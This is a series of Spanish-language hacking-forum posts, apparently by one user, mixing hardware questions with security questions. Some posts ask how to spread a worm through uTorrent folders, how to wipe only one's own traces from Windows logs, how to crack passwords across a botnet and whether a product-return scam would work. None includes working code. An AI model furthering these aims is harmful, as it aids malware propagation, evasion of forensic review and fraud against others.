Luego de conectarme, hago un ifconfig wlan0 y noto que no había ninguna linea que dijera ipv4, pero si otras que decían ipv6. Solo podía conectarme a través de IPv6... Entonces me puse a repasar un poco sobre ésto, e intente escanear todo el link local con nmap, pero no encontré ningún host en toda la red, ni al router. Probé con el comando route y no me devolvía nada, terminé escaneando con wireshark, y vi unas consultas DNS, y yo de lo dormido que estaba no me di cuenta que la IP del router era el destino de la consulta DNS (pense que del router solo era la mac de la capa inferior y el servidor DNS estaría en otro lado, pero estaba muy equivocado, ya que el prefijo era de link local, esto tambien por jamas haber auditando en IPv6), y lo peor fue que si quería la IPv6 del router no haber hecho un man route y haber notado que el comando se usaba con el parámetro -6 en éste caso. Bueno, en fin luego escanié la IPv6 del router con nmap -sV y saltaron 3 puertos abiertos con tcpwrapped. Como en 10 minutos empezaba una charla muuy interesante sobre hackear con subtitulos, me fui y la deje hasta ahi. No pude avanzar prácticamente nada, entre lo dormido, incomodo y por los problemas técnicos que tuvimos, pero bueno, aprendí varias cosas por ser mi primer desafío. Ahrora en casa estaba leyendo sobre tcp wrapper, herramienta que jamás había utilizado. Hace poco aprendí sobre snort, iptables, y selinux, pero tcp wrapper es otra herramienta de hardening importante que no estaba teniendo en cuenta. Lástima que no tuve más tiempo para insistir, ya que la parte interesante recién empezaba, había que probar comunicarse con nc con cada puerto, ver como evitar las reglas de tcp wrapper, pero bueno, supongo que lo que quedaba del desafío era bastante complicado.
#21
Buenas. Supongamos éste caso.

Jose 2 años atras se compra unos parlantes que el dia de hoy le empiezan a fallar y no tiene arreglo, entonces se compra el mismo modelo de parlantes de vuelta.

Qué pasa si Jose llama para reclamar que los parlantes nuevos vinieron defectuosos y devuelve los parlantes viejos que no andan bien limpios en la caja nueva? Tendría un equipo extra de forma gratuita?

Hay alguna forma en la que puedan reconocer éste tipo de fraude? Cada producto tiene un código único o algo por el estilo?

Saludos y gracias!
#22
Foro Libre / Que opinan de los grey hat?
24 Septiembre 2017, 03:06 AM
Buenas, quería saber su opinion respecto a los grey hat, es decir, aquellas personas que se ponen a realizar pruebas de penetración en un host o en una red, interactuando activamente con los servidores (fingerprint), y luego buscando vulnerabilidades y probando exploits, pero sin ser contratados ni haber pedido permiso al responsable de lo servidores (a diferencia de los white hat). Pero de todas formas un grey hat luego de descubrir y haber logrado explotar una vulnerabilidad, la reporta directamente al responsable del servidor para que la parchee, es decir, una vez que el grey hat se entretuvo y puso a prueba sus conocimientos en redes/hosts agenas, tiene una intención positiva y constructiva que es la de mejorar la segurida del servidor, en lugar de leer, escribir la información y controlar el servidor para un propósito poco ético que favoreciese al atacante ( a diferencia de los black hat).

Que opinan de las personas que se mueven asi? Son bien recibidas en ésta comunidad? Algunos de ustedes se mueven de ésta forma? Saludos!
#23
Buenas, estuve buscando vulnerabilidades para el software CUPS que trabaja usualmente en el puerto 631 con el protocolo ipp para servir de servidor de impresion. Encontré una vulnerabilidad del 2015 en CVE catalogada como crítica de 10 puntos:

https://www.cvedetails.com/cve/CVE-2015-1158/

Según dice CVE:

CitarThe add_job function in scheduler/ipp.c in cupsd in CUPS before 2.0.3 performs incorrect free operations for multiple-value job-originating-host-name attributes, which allows remote attackers to trigger data corruption for reference-counted strings via a crafted (1) IPP_CREATE_JOB or (2) IPP_PRINT_JOB request, as demonstrated by replacing the configuration file and consequently executing arbitrary code.   

Incluso el equipo de seguridad de google subió un exploit y mucha información en:

https://www.exploit-db.com/exploits/37336/

El cuál se titula:

CUPS < 2.0.3 - Multiple Vulnerabilities

Mi duda es. Para ustedes ésta vulnerabilidad afectaría al producto CUPS desde su primera versión hasta la 2.0.3 o si la versión es demasiado vieja, ya no se vería afectada por el fallo? Como aquí no aclaran nada, yo supongo que es desde la primera versión hasta la 2.0.3. Si tengo por ejemplo un CUPS 1.7, se supone por lógica que debería ser vulnerable a dicha falla, no?
#24
Muy buenas! Ésta es una duda que siempre tuve, ya que hay muchisimas vulnerabilidades conocidas pero la mayor parte de las veces no hay ejemplos públicos del código de una app vulnerable ni una PoC para explotar dicho fallo. Me imagino que si la vulnerabilidad está en un binario y en la página de CVE menciona la función que tiene la vulnerabilidad, habría que utilizar ingenieria inversa y enfocarse en dicha función... Quería saber si al terminar de leer las guias de exploit writing de corelan estaría capacitado para crear mis propios exploits en base a la información de las CVE, o si también sería necesario leer el manual de cracking de Ricardo Narvaja u otros documentos...

Por otra parte, cuando la vulnerabilidad está en un lenguaje de programación, como Ruby, quería saber como improvisar una aplicación vulnerable y su respectivo PoC. Hace pocos días salió la nueva versión 2.4.2 que corrije éstas vulnerabilidades:

CitarCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf
CVE-2017-10784: Escape sequence injection vulnerability in the Basic authentication of WEBrick
CVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode
CVE-2017-14064: Heap exposure in generating JSON
Multiple vulnerabilities in RubyGems

Tomemos como ejemplo la primera vulnerabilidad:

https://www.ruby-lang.org/en/news/2017/09/14/sprintf-buffer-underrun-cve-2017-0898/

en base a esa información, ustedes como harían para crear/explotar una app? Por donde empezarían o que consideraciones tomarían?

Muchas gracias desde ya por su tiempo! Saludos.
#25
Redes / Importar clave SSL del navegador a Wireshark
15 Septiembre 2017, 07:48 AM
Buenas. Quería saber si era posible importar la clave para descifrar el tráfico HTTPS que conocen los navegadores para poder visualizar  las cabeceras en texto plano en el Wireshark como si de tráfico HTTP se tratase... Se que existen extensiones para los navegadores que sirven de sniffer y ahí si es posible observar en plano todo el tráfico HTTPS que llega al navegador, pero la verdad es que las extensiones que encontre no me resultan tan cómodas para trabajar como el Wireshark, asi que me gustaría saber si existe alguna forma de hacer lo que propongo...

Saludos y gracias!
#26
Buenas! Estaba empezando a leer un poco sobre gusanos, la historia de los primeros, y chusmeando las guías de ésta sección...

Ahora quería saber como poder propagar un malware a través de P2P pero utilizando ThePirateBay/KickAss torrent + el µTorrent en caso de que la víctima lo tenga instalado.

Encontré ésto en éste foro: 

http://foro.elhacker.net/analisis_y_diseno_de_malware/srcc_propagacion_p2p_emule-t258814.0.html

que funciona para Emule, básicamente se fija si se encuentra instalado en la víctima, en caso positivo, busca su directorio de descargas y copia el gusano en éste directorio y luego lo esconde con atributos hidden... Básicamente haría ésto. Está perfecto como funciona, pero me gustaría poder hacer lo mismo sobre utorrent... Intenté copiar un archivo sobre la carpeta de descargas de utorrent, pero el archivo no figura como "Compartiendo" cuando abro el utorrent... Supongo que ésto que hice habría que hacerlo pero me estoy comiendo más pasos...

Me gustaría entonces que me dieran una mano con ésto. Si tienen un código a mano para realizar ésto, me vendría muy bien. Pero no es necesario, yo se programar y puedo arreglarme con mi amigo google (no soy un script kiddie), asi que si me ayudan con ideas, pasos o la lógica que tendría que tener para implementar lo que propongo, me es más que suficiente...

Saludos y muchas gracias!
#27
Muy buenas! Quería que me recomienden el algoritmo de hash más seguro para almacenar información importante en una DB. Tengo bien entendido que md5 se está desaconcejando ya que tiene problemas de colisiones, por lo tanto debería ser alguno de la familia de SHA... Pero de cuantos bits? 256, 512? Ademas necesitaría agregar un salt... Como debería ser ese salt? de que longitud, de que características? Gracias desde ya por la ayuda!
#28
Buenas! Estuve probando atacarme via XSS, y Chrome viene con el filtro anti XSS (el XSS Auditor)  que impide ejecutar javascript si el mismo es enviado en el enlace... Estuve revisando las configuraciones de Chrome y note que no se puede desactivar dicho filtro desde el navegador, la única forma en la que pude lograr un ataque XSS a través de Chrome fue utilizando

Header set X-XSS-Protection 0

en mi Apache... Forzando con ésta cabecera a desactivar el filtro anti XSS de Chrome... Según lei hubo formas para bypassear dichos filtros en distintas versiones, pero dudo que se pueda bypassear la version mas actual de Chrome...

En cuanto a Internet Explorer, también cuenta con el filtro anti XSS y se puede forzar/desactivar también a través del X-XSS-Protection. La diferencia que note respecto a Chrome es que Internet Explorer tambien permite desactivar dicho filtro a través de la configuracion en el mismo navegador...

Bueno, todo ésto es lo que probé hasta ahora, tal vez este equivocado con lo que digo, y tal vez haya formas de bypassear filtros de Chrome en versiones actuales, o también se pueda desactivar el filtro de Chrome desde el navegador y yo no lo sepa... En ese caso me gustaría que me corrigieran.

Respecto a Firefox, noté que no cuenta con ningún filtro... Puedo ejecutar javascript desde el enlace aunque el servidor de la pagina tenga el header

X-XSS-Protection 1; mode=block

lo cual me parece bastante mal, ya que si bien hay muchas formas de evitar ataques de XSS (a través de código seguro, y adicionalmente WAFs), me parece que Firefox está quitando una capa adicional de seguridad, y ésto lo convierte en un navegador poco seguro... Ustedes que piensan?

Saludos y gracias!
#29
Buenas! Quería saber si ya existe algún software que te permita hacer cracking distribuido en una botnet, es decir, un programa en el que el atacante luego de haber conseguido el control de muchas computadoras pueda dividir un diccionario, asignar a cada computadora una parte del wordlist, y supervisar el estado de cada computadora, es decir, si están en estado activo (crackeando), si terminaron y no dieron con la password, y una alerta cuando cualquiera de las computadoras de con la password.

Me gustaría conseguir y probar con muchas VM un programa que cumpla con eso, si no existe me gustaría desarrollarlo para experimentar, pero si ya existe, prefiero chusmear el código fuente de el que esté hecho en lugar de reinventar la rueda...

Saludos y gracias!
#30
Muy buenas! Ésta pregunta que voy a hacer es bastante genérica y aplica para distintos dispositivos (PC o TV por ejemplo). Les doy ejemplos de cosas que me pasaron y sus respectivas soluciones:

Problema:
Me quedo sin audio
Solución:
Reconecto el jack del audio

Problema:
En la TV determinado canal se ve mal, con fragmentos de la imagen repetidos en la pantalla
Solución:
Reconectar el HDMI que va del deco al tv

Problema:
Al levantar el mouse del pad el puntero se mueve solo fantasmalmente
Solución:
Reconectar el USB del mouse


En fin, estamos hablando de distintos dispositivos, de problemas muy variados, pero siempre de una misma solución, desconectar y conectar cables. Si bien se que hacer ésto puede solucionar varios problemas que tengamos, no entiendo que es lo que está pasando internamente al reconectar los cables... Se ejecuta algún código cada vez que se enchufa algo? A qué se deben los fallos?

Saludos y muchas gracias desde ya
#31
Hardware / Posible fallo en la placa de video
24 Agosto 2017, 23:24 PM
Muy buenas! Resulta que a mi mama se le había tildado la pc, y la tuvo que resetear. Al resetearla, se estanca en la pantalla inicial del BIOS y con rayas, y la imagen toda deformada:



Supongo que se cago la placa de video... Si ya les paso, o están familiarizados con éste problema, me gustaría saber cual es la causa del mismo, y cómo podría solucionarlo. La placa de video es ONBOARD. Ya veo que voy a tener que comprarme una placa de video dedicada, cosa que me da por las pelotas ya que es una pc que usa mi mama solo para word y navegar y no le interesa gozar de una buena fluidez ni calidad gráfica ya que no tiene interés en utilizarla para juegos ni para diseño.

Aca les dejo mas características del hardware:

-Microprocesador: AMD Athlon 64 x2
-RAM: 3GB DDR2 (tenía 1GB y le agregué 2GB más hace una semana)
-GPU Onboard
-Disco 160gb
-Motherboard NF615 Micro AM2 SE
-Fuente 500W

P.D.: Donde vivo, en éste momento el clima está pesado, con mucha humedad y nublado.

Saludos y muchas gracias por la ayuda!

MOD: Imagen adaptada a lo permitido.
#32
Muy buenas. Estaba a punto de obtener una tarjeta y me puse a leer un poco pero me surgieron algunas dudas: Con los números del frente de la tarjeta, y el valor de verificación de la tarjeta (CVV) es suficiente para realizar una compra en línea? Si ésto es asi, significa que cualquier persona que pueda ver la tarjeta, por ejemplo un empleado que la toma cuando hacemos un pago en una tienda física a través de la tarjeta, y tenga memoria o anote dichos numeros en algún lado ya sería capaz de hacer compras en internet a través de nuestra tarjeta? Si ésto es asi me daría mucho miedo. De hecho por algún sitio lei que inclusive algunas páginas de compras solo piden el numero de tarjeta y no el CVV. PEOR! Entonces cualquier persona que ve el frente de la tarjeta ya puede hacer transacciones en nuestro lugar. Y por último, leí tambien sobre los métodos de clonar tarjetas, y según mi razonamiento, el hecho de clonar las tarjetas sirve para copiar el valor magnético que luego se puede utilizar para compras en tiendas físicas, en cambio, si el fraude solo copiara o memorizara mis números solo estaría habilitado para hacer transacciones en linea. Corrijanme ésta última afirmación. Me gustaría que me ayudaran a comprender mejor sobre éste tema, ya que si una persona sabiendo el número de mi tarjeta (y que ni siquiera sepa el CVV), pueda hacer transacciones en mi lugar sería algo que me daría mucho miedo. Es decir, jamás realizaría ninguna compra en una tienda física ni se la dejaría ver a nadie, y la guardaría en una caja fuerte... Saludos y gracias!
#33
Buenas! Ayer publiqué un problema que tuve que me dificultó instalar Windows 7 sobre una PC con hardware viejo... Luego de que me ayudaran con una excelente solución, pude instalarlo perfectamente pero el problema que tengo ahora es que anda demasiado lento... Por dar un ejemplo, cuando le quiero dar al boton Aceptar luego de instalar algo (adobe reader por ejemplo), se cuelga varios segundos hasta cerrar la ventana....

Hardware:
-Microprocesador: AMD Athlon 64 x2
-RAM: 1GB DDR2
-GPU Onboard
-Disco 160gb
-Motherboard NF615 Micro AM2 SE
-Fuente 500W

SO:
Windows 7 Ultimate x64

Según leí las especificaciones de Windows 7, para SO de 64 bits son necesarios 2GB de RAM... Mi pregunta es, en éste caso, si compro 2GB de RAM extra, (consiguiendo un total de 3GB), ustedes piensan que el rendimiento va a mejorar y voy a poder usar tranquilamente mi PC? (Quiero solo un uso de navegador, abrir facebook, youtube, usar office, adobe reader)... Nada de juegos ni programas pesados de diseño ni producción musical. Ustedes dicen que el procesador safa? Es decir, yo creo que con el mismo procesador y más RAM ya voy a dejar de sufrir éste problema. Pero tal vez  a su criterio también sería hora de cambiar el micro... Y si conocen algun tipo de configuración especial para el SO que me agilice un poco la PC tambien es bienvenido. Saludos y gracias!
#34
Muy buenas! Les comento mi situación. Tenía una computadora con Windows 7 más nueva y una con Windows XP más vieja. Quería instalar Windows 7 en la vieja, pero resulta que tenía averiada la lectora de DVD asi que no puedo bootear desde DVD... No hay problema, para algo existe el pendrive.... Bueno, grabo Windows 7 en mi pendrive (memoria flash), y luego intento bootear desde el pen... Y tuve un problema cuya soluciones no me sirvieron, anulandome la posibilidad de bootear desde el pendrive... Bueno, dadas éstas condiciones lo que hice fue conectar el disco rígido de la pc vieja en el mother de la nueva (usando todo el hardware de la pc nueva que si funciona bien)... Luego de unos minutos Windows se instaló satisfactoriamente, y arrancaba perfectamente con el hardware de la pc nueva... Una vez que desconecto el disco de la pc vieja y vuelvo a conectarlo sobre la mother de la pc vieja, y enchufo todos los cables, cuando empieza a arrancar Windows con la pantalla negra y el logo, se congela durante 1 segundo y se reinicia, es decir, vuelve a bootear, y ahí luego me pregunta si deseo iniciar windows normalmente o si deseo reparar el inicio. Cuando le doy a reparar el inicio, aparece la ventanita negra con la barrita gris y el letrero: "Windows is loading files..." y luego empieza a buscar una solución que nunca encuentra, y queda mucho tiempo dando vueltas sin hacer nada... Si quiero volver a encenderla, vuelve a pasar lo mismo. Lo raro es que con el hardware de la pc nueva puedo iniciar Windows excelentemente bien, y con el hardware de la pc vieja no... Y horas antes de instalarle Windows 7, la pc vieja funcionaba bien con el Windows XP instalado... Entonces no entiendo como solucionar éste problema... Espero que me hayan entendido y puedan ayudarme. Si necesitan más información sobre el hardware/software, díganmelo. Saludos!

Hardware PC vieja:
-Microprocesador: AMD Athlon x2
-RAM: 1GB DDR2
-GPU Onboard
-Disco 160gb
-Mother NF615 Micro AM2 SE
-Fuente 500W

Sistema operativo:
Windows 7 Ultimate x64


Más información:
-El MBR está correcto. Ya probé reparar el boot desde cmd con la unidad de windows.

-Se me ocurre que el problema tiene que ver con la BIOS. De todas formas, intenté con Restore defaults values y nada. Adicionalmente, vi ésta solución:

http://es.ccm.net/forum/affich-1331383-mi-computadora-se-reinicia-sola-antes-de-entrar-a-windows, que decía:

CitarBueno a veces es una pavada ; me pasaba lo mismo se me reiniciaba la pc en medio de la carga del logo del sistema; ya un dia cansado lei parte por parte el bios ; y en una parte en configuración de los discos el modo de uso estaba en AHCI y lo cambie a IDE le di aceptar guardar cambios y la mendiga maquina que inicia normal .....

pero en mi BIOS me fui al apartado de Integrated Peripherals y no encontré dicha configuración. Aquí el manual de mi BIOS
http://static.highspeedbackbone.net/pdf/Biostar_NF61S_Micro_AM2_SE_Manual.pdf
-Probé


-Tal vez vaya por el lado de la RAM. La PC la tengo bastante limpia. Las últimas veces luego de limpiarla, (con aspiradora por los coolers, y un cepillo de dientes con alcohol isopropilico por las ranuras de la RAM), al encenderla, el BIOS hacía pitidos constantes. Luego saqué la RAM y la volví a poner y arrancó la PC normalmente (ésto cuando aún tenía Windows XP).Hoy probé limpiando la RAM, colocándola en el otro socket, y en un momento volví a tener los mismos pitidos iniciales, hasta que la volví a colocar y superé los pitidos inciciales pero se sigue reiniciado al iniciar Windows 7. De todas formas me parece raro que sea problema de la memoria.

-La pantalla que usé para instalar Windows 7 era de 23 pulgadas, por lo que dejé configurado Windows con resolución de 1900x1200. Luego al llevar el disco a la pc vieja, el monitor que estoy usando es de 17 pulgadas. No creo que tenga que ver pero por ahí la resolución tan alta que quedó configurada pueda estar haciendo que se reinicie. Igual es muy raro ésto que planteo.
#35
Buenas! Resulta que quería saber el tráfico que entraba y salía de mi pc a través de tor, entonces abrí el Wireshark, puse lo o (Loopback) como interfaz para capturar, y luego generé tráfico hacia una web a través de tor, pero ese tráfico no se capturó. Yo pensé que como mandaba y recibía todo por 127.0.0.1:9050 podría ver ese tráfico capturando en loopback.... Pero no, no pude capturar nada, y luego noté que no estoy capturando nada de nada. Envío ping 127.0.0.1 y los paquetes ICMP no llegan al Wireshark... Alguna idea?
#36
Buenas! Estuve explorando en cve.mitre.org las vulnerabilidades que hay para determinados productos, las cuales suelen ser unas cuantas. Pero a la hora de buscar exploits para dichas vulnerabilidades, (incluyendo exploits de exploit-db, y buscando los exploits en google en general, ya que por ejemplo, a veces hay exploits que se encuentran en github y no en exploit-db), el número de exploits suele ser bajo, es decir hay muchas vulnerabilidades conocidas, etiqutadas con una CVE, pero no hay exploits publicos para explotar a cada una de ellas... De hecho noté que hay exploits que se suben pasado por ejemplo un año de haberse descubierto la vulnerabilidad.

Mis incógnitas son:
Cuando un pentester encuentra una cve que afecte al producto que está analizando pero no encuentra un exploit para afectar dicha vulnerabilidad, se supone que tendría que crear su propio exploit?
Se pueden escribir exploits para todas las CVE? O hay CVE que directamente no se puedan explotar?
En caso de que lo anterior sea positivo, supongo que deberían existir exploits para todas las vulnerabilidades ya creados aunque no hechos públicos, cosa que me resulta extraña, ya que debe haber mucha gente que se dedique a la seguridad informática con ganas de compartir lo que crea. Es decir, en internet está prácticamente todo, ya que alguna u otra persona termina compartiendo determinado conocimiento.

Saludos y gracias de antemano!
#37
Buenas! Lei que una consideración importante de seguridad (en el caso de un servidor) es aislar cada servicio (por ejemplo HTTP, SMTP, SSH), en diferentes máquinas, tanto físicas como virtuales. Primero se me ocurrió utilizar LXC y utilizar un servicio en cada container, para poder tener aislados los servicios sin necesidad de más de un kernel. El problema que encontré en éste método es que dentro de cada container no se aplica la política de SELinux... Entonces me parece que la mejor alternativa es utilizar sistemas operativos separados por VM, asi en una VM tengo solo el servicio HTTP, con SELinux habilitado, reglas iptables, y asi por cada VM... En la segunda tendría SMTP con su SELinux y reglas propias de iptables... Me gustaría en primer lugar que me dijeran si éste esquema de seguridad que estoy planteando es eficiente o si hay formas de hacerlo aun mejor, y en segundo lugar que me recomendaran un buen hipervisor de linux para lo que necesito...

P.D.: Otra duda que me queda es la utilidad de LXC ya que en cada container no se aplican las políticas de SELinux, de forma que el mismo queda inutilizado y la seguridad se "degrada"
#38
Muy buenas a todos! Como sabrán luego de explotar un fallo y conseguir acceso (en éste caso a un SO WinXX), una parte importante de la materia es borrar las huellas. Estuve buscando métodos para limpiar los logs pero no estoy satisfecho con lo que encontré. Por ejemplo, el script clearev de meterpreter elimina TODOS los logs de system, application y security, cosa que me parece un desastre. Lo convenientemente lógico sería borrar solo los logs que uno escribe luego de conseguir el acceso y dejar al sistema con los mismos logs que había antes de que uno entrara. NI MÁS NI MENOS. Luego por otro lado mencionaban la herramienta clearlogs.exe, a la cuál se le puede mandar por parametro un tipo de log, por ejemplo -sec y elimina todos los logs de la categoría security. Sigo sin estar conforme ya que si bien no toca los loggs de system ni applications, eliminaría TODOS los logs de security... Quería saber si conocen alguna método mejor para borrar los logs. Sino tendría que pensar en como crear algún script.... Saludos y gracias!
#39
Hardware / Memoria USB dañada
1 Julio 2017, 23:54 PM
Muy buenas, me compre un SANDISK de 8GB, el pendrive más barato que había. Resulta que lo compré para instalar un Windows 7. Cuando estoy por instalar Windows 7 con la herramienta de Windows 7 to USB me da un error, y la solución indicaba seguir un par de pasos para formatearlo creo que en formato raw, y no me acuerdo que más... Ésto lo hice hace unas semanas. Luego el pendrive queda en raw sin nada, no se reconoce su capacidad, y entonces traté de formatearlo en FAT32 con un montón de herramientas tanto de Windows como de Linux, pero una vez terminado el proceso sigue todo igual que antes... Sigue en formato raw y no se reconoce la capacidad. Probé los métodos usando la interfaz gráfica de Windows, probé el comando FORMAT por linea de comandos, probé Gparted desde Linux, y una vez que formateo en FAT32, sigue en formato "desconocido". Quería saber si hay forma de reparar éste problema por software, ya que a mi se me hace que es problema de Hardware... Gracias desde ya.
#40
Muy buenas, quería saber si hoy en día es posible robar las cookies de facebook. Lo que yo pienso es que no ya que a través de MITM sería imposible ya que facebook usa TLS y las cookies viajan encriptadas, y por XSS sería practicamente imposible, ya que encontrar una vulnerabilidad XSS en facebook sería prácticamente imposible. Además facebook va cambiando la cookies por cada petición que se le hace, como medida extra de seguridad

Pero por ahí me equivoco y existe alguna otra forma para conseguir las cookies de facebook.

Saludos y gracias.
#41
GNU/Linux / Sobre inodos y filesystems
24 Junio 2017, 19:49 PM
Muy buenas, estaba preparándome para el parcial de sistemas operativos, y estaba resolviendo una guía práctica (no para entregar, solo para estudiar), y hubo una pregunta que no supe contestar y me llamó la atención...
La 9 la contesté y la 10 no pude, aca les muestro:

9. Leer el contenido del archivo. ¿Se modificaron algunos de los datos del inodo del archivo?

Ethicalsk@Ethicalsk:~$ cat /mnt/disc1/archivo_ejercicio8
Ethicalsk@Ethicalsk:~$ stat /mnt/disc1/archivo_ejercicio8
 Fichero: /mnt/disc1/archivo_ejercicio8
 Tamaño: 0            Bloques: 0          Bloque E/S: 4096   fichero regular vacío
Dispositivo: 806h/2054d   Nodo-i: 1012        Enlaces: 1
Acceso: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
     Acceso: 2017-06-24 14:35:58.619967799 -0300
Modificación: 2017-06-24 14:31:49.191967799 -0300
     Cambio: 2017-06-24 14:31:49.191967799 -0300
   Creación: -

Se modificó la fecha de acceso.

10. ¿Cómo puede modificar el comportamiento anterior con el fin de evitar esas modificaciones? ¿Es posible hacerlo sin desmontar la partición?

Ésta no se como responderla... Google como evitar que se modifiquen metadatos, como evitar que se modifique el contenido de inodos en linux, y demás cosas pero sin los resultados que esperaba... Lo que haría yo es quitarle los permisos de lectura para que no se pudiera acceder al archivo, por ende no se podría modificar la fecha de acceso... Pero no se si pretenden que responda eso, o si existe una forma para poder leer los archivos y que aún asi la fecha de acceso no cambie por ejemplo... Si ustedes tienen idea de cómo hacer ésto estaría muy agradecido de que me lo hagan saber. Reitero, ésto NO es para que me hagan la tarea, ésta pregunta ya es como algo personal para mi, no puedo quedarme con la duda jaja. Saludos y gracias!
#42
Muy buenas, recién tuve un problema muy grave que nunca había tenido. Resulta que dejé instalando en linux, el sdk de android, y como me suele pasar siempre, el portatil (Sony VAIO) empieza a tomar cierta temperatura, y el cooler se escucha muy fuerte. El portátil estaba apoyado sobre mi cama, pero siempre dejo al aire las ranuras donde se disipa el calor. En un momento toqué la pc x abajo y me pareció levemente húmeda, pero tal vez era mi mano que estaba humedecida de lo que estaba bebiendo. De todas formas, no creo que haya sido por el líquido, ni que se hayan mojado los componentes, ya que no se derramo líquido, solo era una leve humedad. Pasado un rato, reviso la notebook, y estaba apagada... El cargador estaba enchufado, asi que no era por un tema de batería... Inicio linux, y en el momento que me pide el usuario y las credenciales, se vuelve a la pantalla negra con los comandos que se ejecutan al bootear, y se apaga al instante. Luego lo volví a intentar, y pasó exactamente lo mismo. Finalmente me puse a leer un thread de éste foro en el que recomendaban iniciar el BIOS y revisar el tema de la temperatura y eso, pero mi BIOS no tiene para configurar nada del hardware, solo me deja elegir el dispositivo sobre el cual bootear, y un par de cosas más, pero no tengo forma de ver la temperatura de la CPU ni modificar nada relacioando a ésto... Luego de revisar el BIOS, la notebook se vuelve a apagar, al minuto o a los 2 minutos como mucho. Después de ésto intenté volver a iniciarla y directamente no arranca. Presiono el botón para prenderla y no prende. Lo mantengo presionado y tampoco. Nada.

Recién lo pude solucionar sacándole la batería, dejando presionado el botón de inicio durante un minuto, y encendiendo el portatil sin batería. Ahora ademas de poder volverla a encender, tampoco se me apaga al poco tiempo, pero me quedan algunas dudas:

No entiendo la naturaleza del problema ni de ésta solución. Como es que sacando la batería y dejando presionado el botón, de repente pude resusitar a mi notebook??? Según el video al presionar el botón se termina de agotar la energía, pero no termino de entender que es lo que me pasó y cómo funciona la solución. Después adicionalmente, quería preguntarles si saben alguna forma para cuidar la temperatura de mi notebook, y si es malo usarla acostado.

Saludos y gracias!



#43
Muy buenas! Hace un tiempo largo tenía en mente construir la antena del tipo Pringles de la que tanto se habla por ésta sección, ya compré los conectores SMA, y todo lo necesario de electrónica pero nunca pude conseguir la barra roscada de 3mm... Pregunté como en 5 o 6 ferreterías e inclusive en una bulonera... Tampoco conseguí las arandelas necesarias. La única idea que me queda en mente es mandarla a hacer a medida por un tornero, pero supongo que me va a costar millones de dólares :p . Si ustedes ya la construyeron me gustaría que me contaran qué tanto les costó conseguirla, o cómo la terminaron consiguiendo. Saludos y muchas gracias desde ya!
#44
Que tal, tenía la curiosidad de entender como funcionan internamente las publicaciones de facebook, ya que según creo el código fuente nunca fue filtrado, ésta pregunta me la podría contestar alguien atento a lo que ve en facebook día a día.

Supongamos que tengo 700 amigos y hago una publicación en mi muro (tengo todo configurado para que mis publicaciones sean visibles por todos), esa publicación según mi parecer no llega al inicio de los 700 amigos que uno tiene. Lo digo también porque yo tampoco puedo ver en mi inicio lo que publican los 700 amigos.

Mi pregunta entonces es, como logro hacer que lo que publico en mi muro sea visible por mis 700 amigos? Si tengo más likes, poco a poco va empezando a aparecer en el inicio de más cantidad de amigos? O la única forma sería que mis amigos me stalkeen más, asi si me stalkean, podrían ver mi publicación?

Saludos y gracias
#45
Seguridad / Dudas sobre Rubber Ducky
23 Mayo 2017, 07:19 AM
Muy buenas a todos! estuve leyendo un poco sobre Rubber Ducky, y me surgieron algunas dudas. Según tengo entendido funciona sobre puertos USB  3.0... Mis computadoras solo traen USB 2.0... Quería saber si para experimentar con ésta herramienta en mi casa necesitaría comprarme un HUB de puertos USB 3.0, o si puedo insertar el pendrive malicioso y atacarme sobre un puerto USB 2.0. La otra duda que tengo, es si los pendrives que figuran en GitHub pueden seguir incluyendo el micro controlador necesario o si a esta altura del 2017 ya directamente no se utiliza más el Phison 2251-03 sobre dichos modelos de pendrive. Ultima pregunta, según lo que leí el Rubber Ducky es capaz de afectar a cualquier sistema operativo, ya sea Windows, Linux, MAC, etc, indiferentemente de la version, del kernel y de más, quería saber si estaba en lo cierto o si interprete las cosas mal.

Desde ya muchas gracias por aclarar mis dudas. Saludos!